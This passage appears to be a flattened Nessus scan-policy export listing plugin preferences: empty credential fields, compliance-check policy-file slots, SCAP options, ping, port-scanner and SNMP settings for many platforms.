Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + MongoDB Settings + 76512 + MongoDB Settings[entry]:Username : + Username : + entry + + + + + MongoDB Settings + 76512 + MongoDB Settings[password]:Password : + Password : + password + + + + + MongoDB Settings + 76512 + MongoDB Settings[entry]:Database for authentication : + Database for authentication : + entry + + + + + MongoDB Settings + 76512 + MongoDB Settings[entry]:Port : + Port : + entry + 27017 + 27017 + + + Nessus SYN scanner + 11219 + Nessus SYN scanner[radio]:Firewall detection : + Firewall detection : + radio + Automatic (normal);Disabled (softer);Do not detect RST rate limitation + (soft);Ignore closed ports (aggressive) + + Automatic (normal) + + + Nessus TCP scanner + 10335 + Nessus TCP scanner[radio]:Firewall detection : + Firewall detection : + radio + Automatic (normal);Disabled (softer);Do not detect RST rate limitation + (soft);Ignore closed ports (aggressive) + + Automatic (normal) + + + Netapp API Settings + 112118 + Netapp API Settings[entry]:Username : + Username : + entry + + + + + Netapp API Settings + 112118 + Netapp API Settings[password]:Password : + Password : + password + + + + + Netapp API Settings + 112118 + Netapp API Settings[entry]:vFiler : + vFiler : + entry + + + + + Netapp API Settings + 112118 + Netapp API Settings[entry]:Port : + Port : + entry + + + + + NetApp Data ONTAP Compliance Checks + 66934 + NetApp Data ONTAP Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + NetApp Data ONTAP Compliance Checks + 66934 + NetApp Data ONTAP Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + NetApp Data ONTAP Compliance Checks + 66934 + NetApp Data ONTAP Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + NetApp Data ONTAP Compliance Checks + 66934 + NetApp Data ONTAP Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + NetApp Data ONTAP Compliance Checks + 66934 + NetApp Data ONTAP Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + NetApp Data ONTAP Compliance Checks + 66934 + NetApp Data ONTAP Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Office 365 Compliance Checks + 109580 + Office 365 Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Office 365 Compliance Checks + 109580 + Office 365 Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Office 365 Compliance Checks + 109580 + Office 365 Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Office 365 Compliance Checks + 109580 + Office 365 Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Office 365 Compliance Checks + 109580 + Office 365 Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Office 365 Settings + 109581 + Office 365 Settings[entry]:Username : + Username : + entry + + + + + Office 365 Settings + 109581 + Office 365 Settings[password]:Password : + Password : + password + + + + + Office 365 Settings + 109581 + Office 365 Settings[entry]:Client Id : + Client Id : + entry + + + + + Office 365 Settings + 109581 + Office 365 Settings[password]:Client Secret : + Client Secret : + password + + + + + OpenStack Compliance Checks + 86349 + OpenStack Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + OpenStack Compliance Checks + 86349 + OpenStack Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + OpenStack Compliance Checks + 86349 + OpenStack Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + OpenStack Compliance Checks + 86349 + OpenStack Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + OpenStack Compliance Checks + 86349 + OpenStack Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + OpenStack Settings + 86348 + OpenStack Settings[entry]:Username : + Username : + entry + + + + + OpenStack Settings + 86348 + OpenStack Settings[entry]:Tenant Name for Authentication : + Tenant Name for Authentication : + entry + admin + admin + + + OpenStack Settings + 86348 + OpenStack Settings[password]:Password : + Password : + password + + + + + OpenStack Settings + 86348 + OpenStack Settings[entry]:Port : + Port : + entry + 443 + 443 + + + OpenStack Settings + 86348 + OpenStack Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + OpenStack Settings + 86348 + OpenStack Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + yes + yes + + + Oracle Settings + 22076 + Oracle Settings[radio]:Oracle service type : + Oracle service type : + radio + SID;SERVICE_NAME + SID;SERVICE_NAME + + + Oracle Settings + 22076 + Oracle Settings[entry]:Oracle SID : + Oracle SID : + entry + + + + + Oracle Settings + 22076 + Oracle Settings[checkbox]:Test default accounts (slow) + Test default accounts (slow) + checkbox + no + no + + + OVAL Linux Compliance Checks + 83188 + OVAL Linux Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + OVAL Linux Compliance Checks + 83188 + OVAL Linux Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + OVAL Linux Compliance Checks + 83188 + OVAL Linux Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + OVAL Linux Compliance Checks + 83188 + OVAL Linux Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + OVAL Linux Compliance Checks + 83188 + OVAL Linux Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + OVAL Windows Compliance Checks + 83189 + OVAL Windows Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + OVAL Windows Compliance Checks + 83189 + OVAL Windows Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + OVAL Windows Compliance Checks + 83189 + OVAL Windows Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + OVAL Windows Compliance Checks + 83189 + OVAL Windows Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + OVAL Windows Compliance Checks + 83189 + OVAL Windows Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Palo Alto Networks PAN-OS Compliance Checks + 64095 + Palo Alto Networks PAN-OS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Palo Alto Networks PAN-OS Compliance Checks + 64095 + Palo Alto Networks PAN-OS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Palo Alto Networks PAN-OS Compliance Checks + 64095 + Palo Alto Networks PAN-OS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Palo Alto Networks PAN-OS Compliance Checks + 64095 + Palo Alto Networks PAN-OS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Palo Alto Networks PAN-OS Compliance Checks + 64095 + Palo Alto Networks PAN-OS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Palo Alto Networks PAN-OS Settings + 64286 + Palo Alto Networks PAN-OS Settings[entry]:Palo Alto Username : + Palo Alto Username : + entry + + + + + Palo Alto Networks PAN-OS Settings + 64286 + Palo Alto Networks PAN-OS Settings[password]:Palo Alto Password : + Palo Alto Password : + password + + + + + Palo Alto Networks PAN-OS Settings + 64286 + Palo Alto Networks PAN-OS Settings[entry]:Palo Alto Port : + Palo Alto Port : + entry + 443 + 443 + + + Palo Alto Networks PAN-OS Settings + 64286 + Palo Alto Networks PAN-OS Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + Palo Alto Networks PAN-OS Settings + 64286 + Palo Alto Networks PAN-OS Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + no + no + + + Patch Report + 66334 + Patch Report[checkbox]:Display the superseded patches in the report + Display the superseded patches in the report + checkbox + yes + yes + + + PCI DSS compliance + 33929 + PCI DSS compliance[checkbox]:Check for PCI-DSS compliance + Check for PCI-DSS compliance + checkbox + no + no + + + Ping the remote host + 10180 + Ping the remote host[entry]:TCP ping destination port(s) : + TCP ping destination port(s) : + entry + built-in + built-in + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Do an ARP ping + Do an ARP ping + checkbox + yes + yes + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Do a TCP ping + Do a TCP ping + checkbox + yes + yes + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Do an ICMP ping + Do an ICMP ping + checkbox + yes + yes + + + Ping the remote host + 10180 + Ping the remote host[entry]:Number of retries (ICMP) : + Number of retries (ICMP) : + entry + 2 + 2 + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Do an applicative UDP ping (DNS,RPC...) + Do an applicative UDP ping (DNS,RPC...) + checkbox + no + no + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Make the dead hosts appear in the report + Make the dead hosts appear in the report + checkbox + no + no + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Log live hosts in the report + Log live hosts in the report + checkbox + no + no + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Test the local Nessus host + Test the local Nessus host + checkbox + yes + yes + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Fast network discovery + Fast network discovery + checkbox + no + no + + + Ping the remote host + 10180 + Ping the remote host[checkbox]:Interpret ICMP unreach from gateway + Interpret ICMP unreach from gateway + checkbox + no + no + + + Nessus Launched Plugin List + 112154 + Nessus Launched Plugin List[checkbox]:Enable Plugin List Report + Enable Plugin List Report + checkbox + no + no + + + Port scanners settings + 33812 + Port scanners settings[checkbox]:Check open TCP ports found by local port enumerators + + Check open TCP ports found by local port enumerators + checkbox + no + no + + + Port scanners settings + 33812 + Port scanners settings[checkbox]:Only run network port scanners if local port enumeration + failed + + Only run network port scanners if local port enumeration failed + checkbox + yes + yes + + + Rackspace Compliance Checks + 79356 + Rackspace Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Rackspace Compliance Checks + 79356 + Rackspace Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Rackspace Compliance Checks + 79356 + Rackspace Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Rackspace Compliance Checks + 79356 + Rackspace Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Rackspace Compliance Checks + 79356 + Rackspace Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Rackspace Settings + 79355 + Rackspace Settings[entry]:Username : + Username : + entry + + + + + Rackspace Settings + 79355 + Rackspace Settings[password]:Password or API Key : + Password or API Key : + password + + + + + Rackspace Settings + 79355 + Rackspace Settings[radio]:Authentication Method : + Authentication Method : + radio + API-Key;Password + API-Key;Password + + + Rackspace Settings + 79355 + Rackspace Settings[checkbox]:Dallas-Fort Worth (DFW) : + Dallas-Fort Worth (DFW) : + checkbox + yes + yes + + + Rackspace Settings + 79355 + Rackspace Settings[checkbox]:Chicago (ORD) : + Chicago (ORD) : + checkbox + yes + yes + + + Rackspace Settings + 79355 + Rackspace Settings[checkbox]:Northern Virginia (IAD) : + Northern Virginia (IAD) : + checkbox + yes + yes + + + Rackspace Settings + 79355 + Rackspace Settings[checkbox]:London (LON) : + London (LON) : + checkbox + yes + yes + + + Rackspace Settings + 79355 + Rackspace Settings[checkbox]:Sydney (SYD) : + Sydney (SYD) : + checkbox + yes + yes + + + Rackspace Settings + 79355 + Rackspace Settings[checkbox]:Hong Kong (HKG) : + Hong Kong (HKG) : + checkbox + yes + yes + + + RHEV Settings + 77089 + RHEV Settings[entry]:Username : + Username : + entry + + + + + RHEV Settings + 77089 + RHEV Settings[password]:Password : + Password : + password + + + + + RHEV Settings + 77089 + RHEV Settings[entry]:Port : + Port : + entry + 443 + 443 + + + RHEV Settings + 77089 + RHEV Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + no + no + + + RHEV Compliance Checks + 77090 + RHEV Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + RHEV Compliance Checks + 77090 + RHEV Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + RHEV Compliance Checks + 77090 + RHEV Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + RHEV Compliance Checks + 77090 + RHEV Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + RHEV Compliance Checks + 77090 + RHEV Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Salesforce.com Settings + 76710 + Salesforce.com Settings[entry]:Username : + Username : + entry + + + + + Salesforce.com Settings + 76710 + Salesforce.com Settings[password]:Password : + Password : + password + + + + + Salesforce.com Compliance Checks + 76711 + Salesforce.com Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Salesforce.com Compliance Checks + 76711 + Salesforce.com Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Salesforce.com Compliance Checks + 76711 + Salesforce.com Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Salesforce.com Compliance Checks + 76711 + Salesforce.com Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Salesforce.com Compliance Checks + 76711 + Salesforce.com Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Patch Management: Red Hat Satellite 6 Settings + 84232 + Patch Management: Red Hat Satellite 6 Settings[entry]:Satellite 6 Server : + Satellite 6 Server : + entry + + + + + Patch Management: Red Hat Satellite 6 Settings + 84232 + Patch Management: Red Hat Satellite 6 Settings[entry]:Satellite 6 Port : + Satellite 6 Port : + entry + 443 + 443 + + + Patch Management: Red Hat Satellite 6 Settings + 84232 + Patch Management: Red Hat Satellite 6 Settings[checkbox]:Satellite 6 Use SSL : + Satellite 6 Use SSL : + checkbox + yes + yes + + + Patch Management: Red Hat Satellite 6 Settings + 84232 + Patch Management: Red Hat Satellite 6 Settings[checkbox]:Satellite 6 Verify Certificate + : + + Satellite 6 Verify Certificate : + checkbox + yes + yes + + + Patch Management: Red Hat Satellite 6 Settings + 84232 + Patch Management: Red Hat Satellite 6 Settings[entry]:Satellite 6 Username : + Satellite 6 Username : + entry + + + + + Patch Management: Red Hat Satellite 6 Settings + 84232 + Patch Management: Red Hat Satellite 6 Settings[password]:Satellite 6 Password : + Satellite 6 Password : + password + + + + + Patch Management: Red Hat Satellite Server Settings + 84238 + Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite server(s) + [separated w/ semicolons] : + + Red Hat Satellite server(s) [separated w/ semicolons] : + entry + + + + + Patch Management: Red Hat Satellite Server Settings + 84238 + Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite port(s) : + + Red Hat Satellite port(s) : + entry + 443 + 443 + + + Patch Management: Red Hat Satellite Server Settings + 84238 + Patch Management: Red Hat Satellite Server Settings[checkbox]:Verify SSL certificates : + + Verify SSL certificates : + checkbox + no + no + + + Patch Management: Red Hat Satellite Server Settings + 84238 + Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite username(s) + : + + Red Hat Satellite username(s) : + entry + + + + + Patch Management: Red Hat Satellite Server Settings + 84238 + Patch Management: Red Hat Satellite Server Settings[password]:Red Hat Satellite + password(s) : + + Red Hat Satellite password(s) : + password + + + + + ICCP/COTP TSAP Addressing Weakness + 23812 + ICCP/COTP TSAP Addressing Weakness[entry]:Start COTP TSAP : + Start COTP TSAP : + entry + 8 + 8 + + + ICCP/COTP TSAP Addressing Weakness + 23812 + ICCP/COTP TSAP Addressing Weakness[entry]:Stop COTP TSAP : + Stop COTP TSAP : + entry + 8 + 8 + + + Modbus/TCP Coil Access + 23817 + Modbus/TCP Coil Access[entry]:Start reg : + Start reg : + entry + 0 + 0 + + + Modbus/TCP Coil Access + 23817 + Modbus/TCP Coil Access[entry]:End reg : + End reg : + entry + 16 + 16 + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[file]:SCAP File (zip) #1 : + SCAP File (zip) #1 : + file + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:SCAP Version #1 : + SCAP Version #1 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #1 : + SCAP Data Stream ID (1.2 only) #1 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #1 : + SCAP Benchmark ID #1 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Profile ID #1 : + SCAP Profile ID #1 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:OVAL Result Type #1 : + OVAL Result Type #1 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[file]:SCAP File (zip) #2 : + SCAP File (zip) #2 : + file + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:SCAP Version #2 : + SCAP Version #2 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #2 : + SCAP Data Stream ID (1.2 only) #2 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #2 : + SCAP Benchmark ID #2 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Profile ID #2 : + SCAP Profile ID #2 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:OVAL Result Type #2 : + OVAL Result Type #2 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[file]:SCAP File (zip) #3 : + SCAP File (zip) #3 : + file + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:SCAP Version #3 : + SCAP Version #3 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #3 : + SCAP Data Stream ID (1.2 only) #3 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #3 : + SCAP Benchmark ID #3 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Profile ID #3 : + SCAP Profile ID #3 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:OVAL Result Type #3 : + OVAL Result Type #3 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[file]:SCAP File (zip) #4 : + SCAP File (zip) #4 : + file + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:SCAP Version #4 : + SCAP Version #4 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #4 : + SCAP Data Stream ID (1.2 only) #4 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #4 : + SCAP Benchmark ID #4 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Profile ID #4 : + SCAP Profile ID #4 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:OVAL Result Type #4 : + OVAL Result Type #4 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[file]:SCAP File (zip) #5 : + SCAP File (zip) #5 : + file + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:SCAP Version #5 : + SCAP Version #5 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #5 : + SCAP Data Stream ID (1.2 only) #5 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #5 : + SCAP Benchmark ID #5 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[entry]:SCAP Profile ID #5 : + SCAP Profile ID #5 : + entry + + + + + SCAP Linux Compliance Checks + 66757 + SCAP Linux Compliance Checks[radio]:OVAL Result Type #5 : + OVAL Result Type #5 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[file]:SCAP File (zip) #1 : + SCAP File (zip) #1 : + file + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:SCAP Version #1 : + SCAP Version #1 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #1 : + SCAP Data Stream ID (1.2 only) #1 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #1 : + SCAP Benchmark ID #1 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Profile ID #1 : + SCAP Profile ID #1 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:OVAL Result Type #1 : + OVAL Result Type #1 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[file]:SCAP File (zip) #2 : + SCAP File (zip) #2 : + file + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:SCAP Version #2 : + SCAP Version #2 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #2 : + SCAP Data Stream ID (1.2 only) #2 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #2 : + SCAP Benchmark ID #2 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Profile ID #2 : + SCAP Profile ID #2 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:OVAL Result Type #2 : + OVAL Result Type #2 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[file]:SCAP File (zip) #3 : + SCAP File (zip) #3 : + file + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:SCAP Version #3 : + SCAP Version #3 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #3 : + SCAP Data Stream ID (1.2 only) #3 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #3 : + SCAP Benchmark ID #3 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Profile ID #3 : + SCAP Profile ID #3 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:OVAL Result Type #3 : + OVAL Result Type #3 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[file]:SCAP File (zip) #4 : + SCAP File (zip) #4 : + file + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:SCAP Version #4 : + SCAP Version #4 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #4 : + SCAP Data Stream ID (1.2 only) #4 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #4 : + SCAP Benchmark ID #4 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Profile ID #4 : + SCAP Profile ID #4 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:OVAL Result Type #4 : + OVAL Result Type #4 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[file]:SCAP File (zip) #5 : + SCAP File (zip) #5 : + file + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:SCAP Version #5 : + SCAP Version #5 : + radio + 1.2;1.1;1.0 + 1.2;1.1;1.0 + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #5 : + SCAP Data Stream ID (1.2 only) #5 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #5 : + SCAP Benchmark ID #5 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[entry]:SCAP Profile ID #5 : + SCAP Profile ID #5 : + entry + + + + + SCAP Windows Compliance Checks + 66756 + SCAP Windows Compliance Checks[radio]:OVAL Result Type #5 : + OVAL Result Type #5 : + radio + Full results w/ system characteristics;Full results w/o system + characteristics;Thin results + + Full results w/ system characteristics;Full results w/o system characteristics;Thin + results + + + + Patch Management: SCCM Server Settings + 57029 + Patch Management: SCCM Server Settings[entry]:SCCM Server : + SCCM Server : + entry + + + + + Patch Management: SCCM Server Settings + 57029 + Patch Management: SCCM Server Settings[entry]:SCCM Domain : + SCCM Domain : + entry + + + + + Patch Management: SCCM Server Settings + 57029 + Patch Management: SCCM Server Settings[entry]:SCCM Username : + SCCM Username : + entry + + + + + Patch Management: SCCM Server Settings + 57029 + Patch Management: SCCM Server Settings[password]:SCCM Password : + SCCM Password : + password + + + + + SMB Scope + 10917 + SMB Scope[checkbox]:Request information about the domain + Request information about the domain + checkbox + yes + yes + + + SMTP settings + 11038 + SMTP settings[entry]:Third party domain : + Third party domain : + entry + example.edu + example.edu + + + SMTP settings + 11038 + SMTP settings[entry]:From address : + From address : + entry + nobody@example.edu + nobody@example.edu + + + SMTP settings + 11038 + SMTP settings[entry]:To address : + To address : + entry + postmaster@[AUTO_REPLACED_IP] + postmaster@[AUTO_REPLACED_IP] + + + SNMP settings + 19762 + SNMP settings[entry]:Community name : + Community name : + entry + public + public + + + SNMP settings + 19762 + SNMP settings[entry]:Community name (1) : + Community name (1) : + entry + + + + + SNMP settings + 19762 + SNMP settings[entry]:Community name (2) : + Community name (2) : + entry + + + + + SNMP settings + 19762 + SNMP settings[entry]:Community name (3) : + Community name (3) : + entry + + + + + SNMP settings + 19762 + SNMP settings[entry]:UDP port : + UDP port : + entry + 161 + 161 + + + SNMP settings + 19762 + SNMP settings[entry]:Additional UDP port (1) : + Additional UDP port (1) : + entry + + 161 + + + SNMP settings + 19762 + SNMP settings[entry]:Additional UDP port (2) : + Additional UDP port (2) : + entry + + 161 + + + SNMP settings + 19762 + SNMP settings[entry]:Additional UDP port (3) : + Additional UDP port (3) : + entry + + 161 + + + SNMP settings + 19762 + SNMP settings[entry]:SNMPv3 user name : + SNMPv3 user name : + entry + + + + + SNMP settings + 19762 + SNMP settings[password]:SNMPv3 authentication password : + SNMPv3 authentication password : + password + + + + + SNMP settings + 19762 + SNMP settings[radio]:SNMPv3 authentication algorithm : + SNMPv3 authentication algorithm : + radio + MD5;SHA1 + MD5;SHA1 + + + SNMP settings + 19762 + SNMP settings[password]:SNMPv3 privacy password : + SNMPv3 privacy password : + password + + + + + SNMP settings + 19762 + SNMP settings[radio]:SNMPv3 privacy algorithm : + SNMPv3 privacy algorithm : + radio + AES;DES + AES;DES + + + SonicWALL SonicOS Compliance Checks + 71955 + SonicWALL SonicOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + SonicWALL SonicOS Compliance Checks + 71955 + SonicWALL SonicOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + SonicWALL SonicOS Compliance Checks + 71955 + SonicWALL SonicOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + SonicWALL SonicOS Compliance Checks + 71955 + SonicWALL SonicOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + SonicWALL SonicOS Compliance Checks + 71955 + SonicWALL SonicOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + SonicWALL SonicOS Compliance Checks + 71955 + SonicWALL SonicOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + SSH settings + 14273 + SSH settings[entry]:SSH user name : + SSH user name : + entry + root + root + + + SSH settings + 14273 + SSH settings[password]:SSH password (unsafe!) : + SSH password (unsafe!) : + password + + + + + SSH settings + 14273 + SSH settings[file]:SSH public key to use : + SSH public key to use : + file + + + + + SSH settings + 14273 + SSH settings[file]:SSH private key to use : + SSH private key to use : + file + + + + + SSH settings + 14273 + SSH settings[password]:Passphrase for 